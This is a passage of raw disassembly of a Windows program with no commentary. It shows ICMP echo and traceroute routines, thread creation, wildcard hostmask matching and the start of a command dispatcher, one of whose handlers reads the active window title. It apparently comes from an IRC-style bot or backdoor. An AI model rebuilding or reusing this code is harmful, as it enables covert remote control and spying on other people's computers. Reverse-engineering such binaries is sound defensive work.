push [esp+arg_0]
call ds:dword_4110F4 ; RtlLeaveCriticalSection
retn
sub_406AEF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406AFA proc near ; CODE XREF: sub_40287C+13�p
; sub_40CA47+44D�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
lock xadd [esi], eax
pop esi
pop ebp
retn
sub_406AFA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406B0B proc near ; CODE XREF: sub_4032EF+14�p
; sub_4032EF+20�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
lock xchg eax, [esi]
pop esi
pop ebp
retn
sub_406B0B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406B1B proc near ; CODE XREF: sub_406BE0+13B�p
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
sub esp, 0Ch
call dword_41802C
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_406B3E
push offset aCouldNotGetAVa ; "Could not get a valid ICMP handle\n"
call sub_410AE8 ; printf
pop ecx
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_406B3E: ; CODE XREF: sub_406B1B+12�j
push ebx
push esi
push edi
push 8
lea eax, [ebp+var_C]
push 0
push eax
call sub_410850 ; memset
movzx esi, [ebp+arg_10]
mov al, [ebp+arg_8]
push esi
mov [ebp+var_C], al
call sub_410AE2
mov ebx, eax
push esi
push 45h
push ebx
call sub_410850 ; memset
add esp, 1Ch
cmp [ebp+arg_10], 8
jnb short loc_406B77
push 8
pop eax
jmp short loc_406B79
; ---------------------------------------------------------------------------
loc_406B77: ; CODE XREF: sub_406B1B+55�j
mov eax, esi
loc_406B79: ; CODE XREF: sub_406B1B+5A�j
lea esi, [eax+1Ch]
push esi
call sub_410AE2
pop ecx
mov edi, eax
push [ebp+arg_C]
lea eax, [ebp+var_C]
push esi
push edi
push eax
movzx ax, [ebp+arg_10]
push eax
push ebx
push [ebp+arg_0]
push [ebp+var_4]
call dword_418038
cmp eax, 1
jz short loc_406BB3
call ds:dword_41106C ; RtlGetLastWin32Error
mov ecx, [ebp+arg_4]
mov [ecx], eax
jmp short loc_406BC1
; ---------------------------------------------------------------------------
loc_406BB3: ; CODE XREF: sub_406B1B+89�j
mov eax, [ebp+arg_4]
mov ecx, [edi]
mov [eax+4], ecx
mov ecx, [edi+8]
mov [eax+8], ecx
loc_406BC1: ; CODE XREF: sub_406B1B+96�j
push [ebp+var_4]
call dword_418034
push ebx
call sub_410ADC
push edi
call sub_410ADC
pop ecx
pop ecx
push 1
pop eax
pop edi
pop esi
pop ebx
leave
retn
sub_406B1B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406BE0 proc near ; DATA XREF: sub_406E50+C9�o
var_2D8 = byte ptr -2D8h
var_135 = byte ptr -135h
var_35 = byte ptr -35h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2D8h
push ebx
push esi
push edi
push 2ACh
push [ebp+arg_0]
lea eax, [ebp+var_2D8]
push eax
call sub_410838 ; memcpy
push [ebp+arg_0]
call sub_410832 ; free
xor ebx, ebx
add esp, 10h
cmp byte_418040, bl
jnz short loc_406C6B
push offset aIcmp_dll ; "ICMP.DLL"
call ds:dword_41105C ; LoadLibraryA
cmp eax, ebx
mov dword_418030, eax
jz loc_406E0F
mov esi, ds:dword_411060
push offset aIcmpcreatefile ; "IcmpCreateFile"
push eax
call esi ; GetProcAddress
push offset aIcmpsendecho ; "IcmpSendEcho"
mov dword_41802C, eax
push dword_418030
call esi ; GetProcAddress
push offset aIcmpclosehandl ; "IcmpCloseHandle"
mov dword_418038, eax
push dword_418030
call esi ; GetProcAddress
mov dword_418034, eax
mov byte_418040, 1
loc_406C6B: ; CODE XREF: sub_406BE0+33�j
cmp dword_41802C, ebx
jz loc_406E0F
cmp dword_418038, ebx
jz loc_406E0F
cmp dword_418034, ebx
jz loc_406E0F
lea eax, [ebp+var_135]
push eax
call ds:dword_411254 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+var_18], eax
jnz short loc_406CCF
lea eax, [ebp+var_135]
push eax
call ds:dword_41124C ; gethostbyname
cmp eax, ebx
jz loc_406D4A
movsx ecx, word ptr [eax+0Ah]
mov eax, [eax+0Ch]
push ecx
push dword ptr [eax]
lea eax, [ebp+var_18]
push eax
call sub_410838 ; memcpy
add esp, 0Ch
loc_406CCF: ; CODE XREF: sub_406BE0+C2�j
cmp [ebp+var_35], 1
mov [ebp+var_20], ebx
mov byte ptr [ebp+arg_0], 1
jb loc_406E0F
loc_406CE0: ; CODE XREF: sub_406BE0+229�j
cmp [ebp+var_20], ebx
jnz loc_406E0F
or [ebp+var_C], 0FFFFFFFFh
xor esi, esi
xor edi, edi
cmp [ebp+var_30], ebx
mov [ebp+var_14], ebx
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [ebp+var_1C], ebx
mov [ebp+var_28], ebx
mov [ebp+var_2C], ebx
jbe short loc_406D66
loc_406D08: ; CODE XREF: sub_406BE0+184�j
cmp esi, ebx
jnz short loc_406D66
push 20h
lea eax, [ebp+var_2C]
push [ebp+var_34]
push [ebp+arg_0]
push eax
push [ebp+var_18]
call sub_406B1B
add esp, 14h
test eax, eax
jz loc_406E0F
mov eax, [ebp+var_2C]
cmp eax, ebx
jnz short loc_406D5A
mov eax, [ebp+var_24]
add [ebp+var_1C], eax
cmp eax, [ebp+var_C]
jnb short loc_406D40
mov [ebp+var_C], eax
loc_406D40: ; CODE XREF: sub_406BE0+15B�j
cmp eax, [ebp+var_4]
jbe short loc_406D60
mov [ebp+var_4], eax
jmp short loc_406D60
; ---------------------------------------------------------------------------
loc_406D4A: ; CODE XREF: sub_406BE0+D3�j
push offset aCouldNotResolv ; "Could not resolve name"
call sub_410AE8 ; printf
pop ecx
jmp loc_406E0F
; ---------------------------------------------------------------------------
loc_406D5A: ; CODE XREF: sub_406BE0+150�j
push 1
mov [ebp+var_14], eax
pop esi
loc_406D60: ; CODE XREF: sub_406BE0+163�j
; sub_406BE0+168�j
inc edi
cmp edi, [ebp+var_30]
jb short loc_406D08
loc_406D66: ; CODE XREF: sub_406BE0+126�j
; sub_406BE0+12A�j
mov eax, [ebp+var_28]
cmp [ebp+var_14], ebx
mov [ebp+var_10], eax
jnz short loc_406DCC
mov eax, [ebp+var_1C]
xor edx, edx
div [ebp+var_30]
push 2
push 4
mov [ebp+var_8], eax
lea eax, [ebp+var_10]
push eax
call ds:dword_411234 ; gethostbyaddr
cmp eax, ebx
jz loc_406E18
movzx ecx, byte ptr [ebp+var_10+3]
push ecx
movzx ecx, byte ptr [ebp+var_10+2]
push ecx
movzx ecx, byte ptr [ebp+var_10+1]
push ecx
movzx ecx, byte ptr [ebp+var_10]
push ecx
push dword ptr [eax]
movzx eax, byte ptr [ebp+arg_0]
push [ebp+var_4]
push [ebp+var_8]
push [ebp+var_C]
push eax
lea eax, [ebp+var_2D8]
push offset dword_413560
push eax
call sub_408D50
add esp, 2Ch
jmp short loc_406DF1
; ---------------------------------------------------------------------------
loc_406DCC: ; CODE XREF: sub_406BE0+18F�j
movzx eax, byte ptr [ebp+arg_0]
push [ebp+var_14]
mov [ebp+var_C], ebx
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
push eax
lea eax, [ebp+var_2D8]
push offset dword_413538
push eax
call sub_408D50
add esp, 10h
loc_406DF1: ; CODE XREF: sub_406BE0+1EA�j
; sub_406BE0+26E�j
mov eax, [ebp+var_18]
cmp eax, [ebp+var_10]
jnz short loc_406E00
mov [ebp+var_20], 1
loc_406E00: ; CODE XREF: sub_406BE0+217�j
inc byte ptr [ebp+arg_0]
mov al, byte ptr [ebp+arg_0]
cmp al, [ebp+var_35]
jbe loc_406CE0
loc_406E0F: ; CODE XREF: sub_406BE0+47�j
; sub_406BE0+91�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_406E18: ; CODE XREF: sub_406BE0+1AC�j
movzx eax, byte ptr [ebp+var_10+3]
push eax
movzx eax, byte ptr [ebp+var_10+2]
push eax
movzx eax, byte ptr [ebp+var_10+1]
push eax
movzx eax, byte ptr [ebp+var_10]
push eax
push [ebp+var_4]
movzx eax, byte ptr [ebp+arg_0]
push [ebp+var_8]
push [ebp+var_C]
push eax
lea eax, [ebp+var_2D8]
push offset dword_41350C
push eax
call sub_408D50
add esp, 28h
jmp short loc_406DF1
sub_406BE0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406E50 proc near ; CODE XREF: sub_40735A+744�p
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push esi
push edi
xor edi, edi
cmp [ebp+arg_4], edi
jnz short loc_406E71
push offset unk_4135E4
push [ebp+arg_0]
call sub_408D50
pop ecx
loc_406E6B: ; CODE XREF: sub_406E50+E0�j
pop ecx
jmp loc_406F3C
; ---------------------------------------------------------------------------
loc_406E71: ; CODE XREF: sub_406E50+B�j
push 2ACh
call sub_41082C ; malloc
mov esi, eax
pop ecx
cmp esi, edi
jz loc_406F3C
push 1A3h
push [ebp+arg_0]
push esi
call sub_410838 ; memcpy
push [ebp+arg_4]
lea eax, [esi+1A3h]
push eax
call sub_410820 ; _mbscpy
add esp, 14h
cmp [ebp+arg_8], edi
jz short loc_406EC6
push [ebp+arg_8]
call sub_41088C ; atoi
cmp eax, 0FFh
pop ecx
jg short loc_406EC6
push [ebp+arg_8]
call sub_41088C ; atoi
pop ecx
jmp short loc_406EC9
; ---------------------------------------------------------------------------
loc_406EC6: ; CODE XREF: sub_406E50+59�j
; sub_406E50+69�j
push 1Eh
pop eax
loc_406EC9: ; CODE XREF: sub_406E50+74�j
cmp [ebp+arg_C], edi
mov [esi+2A3h], al
jz short loc_406EEF
push [ebp+arg_C]
call sub_41088C ; atoi
cmp eax, 927C0h
pop ecx
jg short loc_406EEF
push [ebp+arg_C]
call sub_41088C ; atoi
pop ecx
jmp short loc_406EF4
; ---------------------------------------------------------------------------
loc_406EEF: ; CODE XREF: sub_406E50+82�j
; sub_406E50+92�j
mov eax, 7530h
loc_406EF4: ; CODE XREF: sub_406E50+9D�j
cmp [ebp+arg_10], edi
mov [esi+2A4h], eax
jz short loc_406F0A
push [ebp+arg_10]
call sub_41088C ; atoi
pop ecx
jmp short loc_406F0D
; ---------------------------------------------------------------------------
loc_406F0A: ; CODE XREF: sub_406E50+AD�j
push 3
pop eax
loc_406F0D: ; CODE XREF: sub_406E50+B8�j
mov [esi+2A8h], eax
lea eax, [ebp+var_4]
push eax
push edi
push esi
push offset sub_406BE0
push edi
push edi
call ds:dword_4110BC ; CreateThread
cmp eax, edi
jnz short loc_406F35
push esi
call sub_410832 ; free
jmp loc_406E6B
; ---------------------------------------------------------------------------
loc_406F35: ; CODE XREF: sub_406E50+D8�j
push eax
call ds:dword_4110AC ; CloseHandle
loc_406F3C: ; CODE XREF: sub_406E50+1C�j
; sub_406E50+30�j
pop edi
pop esi
leave
retn
sub_406E50 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406F40 proc near ; CODE XREF: sub_40708B+2C�p
var_1108 = byte ptr -1108h
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1108h
call sub_4108B0
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
mov ecx, [esi]
lea ebx, [esi+4]
lea edi, [esi+104h]
push ebx
push edi
lea eax, [esi+204h]
push dword ptr [ecx]
push offset dword_413638
push eax
call sub_408D50
push 2710h
push 0
push offset dword_413634
push edi
call sub_403BBB
mov edi, eax
add esp, 24h
test edi, edi
mov [ebp+var_4], edi
jnz short loc_406F98
xor al, al
jmp loc_407086
; ---------------------------------------------------------------------------
loc_406F98: ; CODE XREF: sub_406F40+4F�j
push ebx
lea eax, [ebp+var_108]
push offset dword_41362C
push eax
call ds:dword_4111EC ; wsprintfA
lea eax, [ebp+var_108]
push eax
call sub_410826 ; strlen
inc eax
push eax
lea eax, [ebp+var_108]
push eax
push edi
call sub_403D54
add esp, 1Ch
test eax, eax
jz loc_407079
lea eax, [ebp+var_1108]
push 1000h
push eax
push edi
call sub_403D69
add esp, 0Ch
test eax, eax
jz loc_407079
cmp eax, 0FFFFFFFFh
jz loc_407079
cmp [ebp+var_1108], 0
lea ebx, [ebp+var_1108]
jz short loc_407075
mov edi, offset dword_418008
loc_40700B: ; CODE XREF: sub_406F40+133�j
push ebx
call sub_40535A
cmp byte ptr [ebx], 0
pop ecx
mov [ebp+arg_0], eax
jz short loc_40702E
push offset dword_412F18
push ebx
call sub_410AEE ; strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_40702E
push ebx
jmp short loc_40703D
; ---------------------------------------------------------------------------
loc_40702E: ; CODE XREF: sub_406F40+D8�j
; sub_406F40+E9�j
lea eax, [ebp+var_1108]
cmp ebx, eax
jz short loc_40704B
push offset dword_413628
loc_40703D: ; CODE XREF: sub_406F40+EC�j
lea eax, [esi+204h]
push eax
call sub_408D50
pop ecx
pop ecx
loc_40704B: ; CODE XREF: sub_406F40+F6�j
push 3E8h
call ds:dword_4110A4 ; Sleep
push edi
call sub_406AE4
mov eax, [esi]
push edi
mov ebx, [eax+4]
call sub_406AEF
pop ecx
test ebx, ebx
pop ecx
jnz short loc_407075
mov ebx, [ebp+arg_0]
cmp byte ptr [ebx], 0
jnz short loc_40700B
loc_407075: ; CODE XREF: sub_406F40+C4�j
; sub_406F40+12B�j
mov bl, 1
jmp short loc_40707B
; ---------------------------------------------------------------------------
loc_407079: ; CODE XREF: sub_406F40+8B�j
; sub_406F40+A8�j ...
xor bl, bl
loc_40707B: ; CODE XREF: sub_406F40+137�j
; DATA XREF: .data:00414C94�o ...
push [ebp+var_4]
call sub_403D27
pop ecx
mov al, bl
loc_407086: ; CODE XREF: sub_406F40+53�j
pop edi
pop esi
pop ebx
leave
retn
sub_406F40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40708B proc near ; DATA XREF: sub_4070F0+87�o
var_3A8 = dword ptr -3A8h
var_2A4 = byte ptr -2A4h
var_1A4 = byte ptr -1A4h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3A8h
push 3A7h
lea eax, [ebp+var_3A8]
push [ebp+arg_0]
push eax
call sub_410838 ; memcpy
push [ebp+arg_0]
call sub_410832 ; free
lea eax, [ebp+var_3A8]
push eax
call sub_406F40
add esp, 14h
test al, al
jnz short loc_4070DE
lea eax, [ebp+var_2A4]
push eax
lea eax, [ebp+var_1A4]
push offset dword_413664
push eax
call sub_408D50
add esp, 0Ch
loc_4070DE: ; CODE XREF: sub_40708B+36�j
push [ebp+var_3A8]
call sub_406753
pop ecx
xor eax, eax
leave
retn 4
sub_40708B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4070F0 proc near ; CODE XREF: sub_40735A+763�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 0
push esi
jz loc_407184
push 3A7h
call sub_41082C ; malloc
mov esi, eax
pop ecx
test esi, esi
jz short loc_407184
push [ebp+arg_4]
lea eax, [esi+4]
push eax
call sub_410820 ; _mbscpy
cmp [ebp+arg_8], 0
pop ecx
pop ecx
jz short loc_407136
push [ebp+arg_8]
lea eax, [esi+104h]
push eax
call sub_410820 ; _mbscpy
pop ecx
pop ecx
jmp short loc_407152
; ---------------------------------------------------------------------------
loc_407136: ; CODE XREF: sub_4070F0+31�j
push edi
lea edi, [esi+104h]
push offset dword_4136A0
push edi
call sub_410820 ; _mbscpy
push edi
call sub_40AC4E
add esp, 0Ch
pop edi
loc_407152: ; CODE XREF: sub_4070F0+44�j
push 1A3h
lea eax, [esi+204h]
push [ebp+arg_0]
push eax
call sub_410838 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push [ebp+arg_8]
push offset dword_413680
push 0
push esi
push offset sub_40708B
call sub_40663C
add esp, 18h
loc_407184: ; CODE XREF: sub_4070F0+8�j
; sub_4070F0+1D�j
pop esi
pop ebp
retn
sub_4070F0 endp
; =============== S U B R O U T I N E =======================================
sub_407187 proc near ; CODE XREF: sub_407187+51�p
; sub_4098BB+125�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
push edi
loc_407191: ; CODE XREF: sub_407187+1C�j
; sub_407187+41�j
mov dl, [esi]
mov cl, [eax]
test dl, dl
jnz short loc_4071A5
test cl, cl
jz short loc_4071CA
cmp cl, 2Ah
jnz short loc_4071EA
inc eax
jmp short loc_407191
; ---------------------------------------------------------------------------
loc_4071A5: ; CODE XREF: sub_407187+10�j
test cl, cl
jz short loc_4071EA
cmp dl, cl
jz short loc_4071C6
cmp cl, 3Fh
jz short loc_4071C6
cmp cl, 23h
jnz short loc_4071CE
cmp dl, 30h
jl short loc_4071C1
cmp dl, 39h
jle short loc_4071C6
loc_4071C1: ; CODE XREF: sub_407187+33�j
cmp dl, 23h
jnz short loc_4071EA
loc_4071C6: ; CODE XREF: sub_407187+24�j
; sub_407187+29�j ...
inc eax
inc esi
jmp short loc_407191
; ---------------------------------------------------------------------------
loc_4071CA: ; CODE XREF: sub_407187+14�j
; sub_407187+5A�j
mov al, 1
jmp short loc_4071EC
; ---------------------------------------------------------------------------
loc_4071CE: ; CODE XREF: sub_407187+2E�j
cmp byte ptr [eax], 2Ah
jnz short loc_4071EA
lea edi, [eax+1]
loc_4071D6: ; CODE XREF: sub_407187+61�j
push edi
push esi
call sub_407187
pop ecx
test al, al
pop ecx
jnz short loc_4071CA
cmp [esi], al
jz short loc_4071EA
inc esi
jmp short loc_4071D6
; ---------------------------------------------------------------------------
loc_4071EA: ; CODE XREF: sub_407187+19�j
; sub_407187+20�j ...
xor al, al
loc_4071EC: ; CODE XREF: sub_407187+45�j
pop edi
pop esi
retn
sub_407187 endp
; =============== S U B R O U T I N E =======================================
sub_4071EF proc near ; CODE XREF: sub_40678D+A5�p
; sub_406868+D0�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
loc_4071FA: ; CODE XREF: sub_4071EF+1D�j
; sub_4071EF+61�j
mov cl, [esi]
test cl, cl
jnz short loc_40720E
mov cl, [eax]
test cl, cl
jz short loc_407252
cmp cl, 2Ah
jnz short loc_407272
inc eax
jmp short loc_4071FA
; ---------------------------------------------------------------------------
loc_40720E: ; CODE XREF: sub_4071EF+F�j
mov dl, [eax]
test dl, dl
jz short loc_407272
cmp cl, dl
jz short loc_40724E
cmp cl, 41h
jl short loc_407222
cmp cl, 5Ah
jle short loc_40722C
loc_407222: ; CODE XREF: sub_4071EF+2C�j
cmp cl, 61h
jl short loc_407235
cmp cl, 7Ah
jg short loc_407235
loc_40722C: ; CODE XREF: sub_4071EF+31�j
mov bl, cl
xor bl, 20h
cmp bl, dl
jz short loc_40724E
loc_407235: ; CODE XREF: sub_4071EF+36�j
; sub_4071EF+3B�j
cmp dl, 3Fh
jz short loc_40724E
cmp dl, 23h
jnz short loc_407256
cmp cl, 30h
jl short loc_407249
cmp cl, 39h
jle short loc_40724E
loc_407249: ; CODE XREF: sub_4071EF+53�j
cmp cl, 23h
jnz short loc_407272
loc_40724E: ; CODE XREF: sub_4071EF+27�j
; sub_4071EF+44�j ...
inc eax
inc esi
jmp short loc_4071FA
; ---------------------------------------------------------------------------
loc_407252: ; CODE XREF: sub_4071EF+15�j
; sub_4071EF+7A�j
mov al, 1
jmp short loc_407274
; ---------------------------------------------------------------------------
loc_407256: ; CODE XREF: sub_4071EF+4E�j
cmp byte ptr [eax], 2Ah
jnz short loc_407272
lea edi, [eax+1]
loc_40725E: ; CODE XREF: sub_4071EF+81�j
push edi
push esi
call sub_4071EF
pop ecx
test al, al
pop ecx
jnz short loc_407252
cmp [esi], al
jz short loc_407272
inc esi
jmp short loc_40725E
; ---------------------------------------------------------------------------
loc_407272: ; CODE XREF: sub_4071EF+1A�j
; sub_4071EF+23�j ...
xor al, al
loc_407274: ; CODE XREF: sub_4071EF+65�j
pop edi
pop esi
pop ebx
retn
sub_4071EF endp
; =============== S U B R O U T I N E =======================================
sub_407278 proc near ; CODE XREF: sub_407290+A4�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push 1
test ecx, ecx
pop eax
jz short locret_40728F
cmp ecx, eax
jl short locret_40728F
loc_407287: ; CODE XREF: sub_407278+15�j
imul eax, [esp+arg_0]
dec ecx
jnz short loc_407287
locret_40728F: ; CODE XREF: sub_407278+9�j
; sub_407278+D�j
retn
sub_407278 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407290 proc near ; CODE XREF: sub_404240+27�p
; sub_40735A+C7D�p ...
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
mov esi, offset aAbcdef ; "abcdef"
lea edi, [ebp+var_18]
xor ebx, ebx
movsd
movsw
movsb
mov esi, [ebp+arg_0]
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
cmp byte ptr [esi], 30h
jnz short loc_4072C6
mov al, [esi+1]
push 1
cmp al, 78h
pop ebx
jz short loc_4072C3
cmp al, 58h
jnz short loc_4072C6
loc_4072C3: ; CODE XREF: sub_407290+2D�j
push 2
pop ebx
loc_4072C6: ; CODE XREF: sub_407290+23�j
; sub_407290+31�j
push esi
call sub_410826 ; strlen
mov edi, eax
pop ecx
cmp ebx, edi
mov [ebp+var_10], edi
mov [ebp+arg_0], ebx
jge short loc_40734E
sub edi, ebx
dec edi
loc_4072DC: ; CODE XREF: sub_407290+BC�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+esi]
push eax
call sub_410AF4 ; tolower
cmp eax, 30h
pop ecx
mov [ebp+var_C], eax
jl short loc_4072FF
cmp eax, 39h
jg short loc_4072FF
add eax, 0FFFFFFD0h
mov [ebp+var_4], eax
jmp short loc_407331
; ---------------------------------------------------------------------------
loc_4072FF: ; CODE XREF: sub_407290+60�j
; sub_407290+65�j
cmp eax, 61h
jl short loc_407356
cmp eax, 66h
jg short loc_407356
mov dl, [ebp+var_18]
test dl, dl
jz short loc_407331
push 0Ah
lea eax, [ebp+var_18]
pop ebx
lea ecx, [ebp+var_18]
sub ebx, eax
loc_40731B: ; CODE XREF: sub_407290+9F�j
movsx eax, dl
cmp [ebp+var_C], eax
jnz short loc_407329
lea eax, [ebx+ecx]
mov [ebp+var_4], eax
loc_407329: ; CODE XREF: sub_407290+91�j
mov dl, [ecx+1]
inc ecx
test dl, dl
jnz short loc_40731B
loc_407331: ; CODE XREF: sub_407290+6D�j
; sub_407290+7E�j
push edi
push 10h
call sub_407278
imul eax, [ebp+var_4]
add [ebp+var_8], eax
inc [ebp+arg_0]
mov eax, [ebp+arg_0]
pop ecx
dec edi
cmp eax, [ebp+var_10]
pop ecx
jl short loc_4072DC
loc_40734E: ; CODE XREF: sub_407290+47�j
mov eax, [ebp+var_8]
loc_407351: ; CODE XREF: sub_407290+C8�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_407356: ; CODE XREF: sub_407290+72�j
; sub_407290+77�j
xor eax, eax
jmp short loc_407351
sub_407290 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40735A proc near ; CODE XREF: sub_408F9D+911�p
var_59AC = byte ptr -59ACh
var_19AC = byte ptr -19ACh
var_9AC = byte ptr -9ACh
var_5A8 = byte ptr -5A8h
var_528 = byte ptr -528h
var_3A8 = byte ptr -3A8h
var_384 = byte ptr -384h
var_363 = byte ptr -363h
var_360 = byte ptr -360h
var_2E4 = byte ptr -2E4h
var_1E0 = byte ptr -1E0h
var_1BC = byte ptr -1BCh
var_19B = byte ptr -19Bh
var_9B = dword ptr -9Bh
var_97 = byte ptr -97h
var_31 = byte ptr -31h
var_23 = byte ptr -23h
var_20 = byte ptr -20h
var_1D = dword ptr -1Dh
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
mov eax, 59ACh
call sub_4108B0
push ebx
push esi
mov esi, [ebp+arg_14]
push edi
push dword ptr [esi]
call sub_409CCF
push [ebp+arg_0]
mov edi, eax
lea eax, [ebp+var_1BC]
push eax
call sub_410820 ; _mbscpy
push [ebp+arg_8]
lea eax, [ebp+var_19B]
push eax
call sub_410820 ; _mbscpy
mov eax, [ebp+arg_C]
push 7Ah
push [ebp+arg_10]
mov [ebp+var_9B], eax
lea eax, [ebp+var_97]
push eax
call sub_410838 ; memcpy
add esp, 20h
cmp edi, dword_413DBC
push 1
pop eax
mov [ebp+var_1D], eax
jnz short loc_4073D0
lea eax, [ebp+var_1BC]
push eax
call sub_40FCB2
jmp loc_4083ED
; ---------------------------------------------------------------------------
loc_4073D0: ; CODE XREF: sub_40735A+63�j
cmp edi, dword_413DB0
jnz short loc_40741E
mov eax, [esi+4]
test eax, eax
jnz short loc_407412
lea eax, [ebp+var_3A8]
push eax
lea eax, [ebp+var_384]
push eax
lea eax, [ebp+var_1E0]
push eax
call sub_404354
add esp, 0Ch
lea eax, [ebp+var_1E0]
push eax
loc_407403: ; CODE XREF: sub_40735A+C2�j
push offset dword_413DA8
loc_407408: ; CODE XREF: sub_40735A+81C�j
; sub_40735A+94C�j
call sub_408E60
jmp loc_4083B3
; ---------------------------------------------------------------------------
loc_407412: ; CODE XREF: sub_40735A+83�j
push eax
call sub_408F4C
pop ecx
push dword ptr [esi+4]
jmp short loc_407403
; ---------------------------------------------------------------------------
loc_40741E: ; CODE XREF: sub_40735A+7C�j
cmp edi, dword_413D9C
jnz short loc_407458
lea eax, [ebp+var_5A8]
push 200h
push eax
call ds:dword_4111F4 ; GetForegroundWindow
push eax
call ds:dword_4111F0 ; GetWindowTextA
test eax, eax
jle loc_4083EE
lea eax, [ebp+var_5A8]
push eax
push offset dword_413D80
jmp loc_4079E3
; ---------------------------------------------------------------------------
loc_407458: ; CODE XREF: sub_40735A+CA�j
cmp edi, dword_413D74
jnz short loc_407477
push dword ptr [esi+8]
lea eax, [ebp+var_1BC]
push dword ptr [esi+4]
push eax
call sub_4050D1
jmp loc_4079EF
; ---------------------------------------------------------------------------
loc_407477: ; CODE XREF: sub_40735A+104�j
cmp edi, dword_413D68
jnz loc_40754B
mov eax, [ebp+arg_18]
xor ebx, ebx
mov eax, [eax+4]
cmp eax, ebx
jz loc_4083EE
push 180h
push eax
lea eax, [ebp+var_360]
push eax
call sub_4052A6
lea eax, [ebp+var_360]
push eax
call sub_410826 ; strlen
mov esi, eax
add esp, 10h
cmp esi, 3
jle short loc_4074F1
lea edi, [ebp+esi+var_363]
push offset dword_413D64
push edi
call sub_410AEE ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4074F1
lea eax, [ebp+var_360]
mov [edi], bl
push eax
call sub_40519C
lea eax, [ebp+var_360]
push eax
call sub_410826 ; strlen
pop ecx
mov esi, eax
pop ecx
loc_4074F1: ; CODE XREF: sub_40735A+15F�j
; sub_40735A+177�j
mov eax, esi
push 4
cdq
pop ecx
idiv ecx
mov ecx, esi
sub ecx, eax
cmp ecx, 180h
ja loc_4083EE
lea eax, [ebp+var_360]
push esi
push eax
call sub_409E1D
lea eax, [ebp+var_360]
push esi
push eax
call sub_409E49
push eax
lea eax, [ebp+var_528]
push eax
lea eax, [ebp+var_360]
push eax
call sub_409B9F
add esp, 1Ch
lea eax, [ebp+var_528]
push eax
push offset dword_413D40
jmp loc_4079E3
; ---------------------------------------------------------------------------
loc_40754B: ; CODE XREF: sub_40735A+123�j
cmp edi, dword_413D34
jnz loc_4075E9
mov esi, [ebp+arg_18]
xor ebx, ebx
mov eax, [esi+4]
cmp eax, ebx
jz loc_4083EE
cmp byte ptr [eax], 3Dh
jnz loc_4083EE
inc eax
push eax
call sub_409C55
test eax, eax
pop ecx
jz loc_4083EE
mov eax, [esi+4]
inc eax
push eax
call sub_410826 ; strlen
pop ecx
mov ecx, eax
push 4
cdq
pop edi
idiv edi
sub ecx, eax
